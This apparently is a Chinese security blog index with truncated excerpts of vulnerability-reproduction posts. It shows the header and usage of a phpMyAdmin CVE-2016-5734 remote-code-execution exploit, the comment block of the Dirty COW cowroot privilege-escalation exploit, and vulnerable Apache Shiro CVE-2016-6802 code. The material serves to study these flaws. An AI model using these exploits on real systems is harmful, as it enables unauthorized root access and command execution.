cve-2016-5734利用EXP说明: 登录PhpMyadmin后可以直接执行命令,提权。 CODE: #!/usr/bin/env python “””cve-2016-5734.py: PhpMyAdmin 4.3.0 – 4.6.2 authorized user RCE exploit Details: Working only at PHP 4.3.0-5.4.6 versions, because of regex break with null byte fixed in PHP 5.4.7. CVE: CVE-2016-5734 Author: https://twitter.com/iamsecurity run: ./cve-2016-5734.py -u root –pwd=”” http://localhost/pma -c “system(‘ls -lua’ […]
CVE漏洞复现
[提权] 脏牛漏洞 Dirty COW CVE-2016-5195 2.6.22 < 3.9 (x86/x64)
/* * (un)comment correct payload first (x86 or x64)! * * $ gcc cowroot.c -o cowroot -pthread * $ ./cowroot * DirtyCow root privilege escalation * Backing up /usr/bin/passwd.. to /tmp/bak * Size of binary: 57048 * Racing, this may take a while.. * /usr/bin/passwd is overwritten * Popping root shell. * Don’t forget to restore /tmp/bak * thread stopped * thread stopped * root@box:/root/cow# id * uid= […]
Apache Shiro CVE-2016-6802 权限绕过漏洞
关于Apche shiro权限Bypass漏洞,漏洞代码段 public static String getContextPath(HttpServletRequest request) { String contextPath = (String) request.getAttribute(INCLUDE_CONTEXT_PATH_ATTRIBUTE); if (contextPath == null) { contextPath = request.getContextPath(); } if (“/”.equals(contextPath)) { // Invalid case, but happens for includes on Jetty: silently adapt it. contextPath = “”; } return decodeRequestString(re […]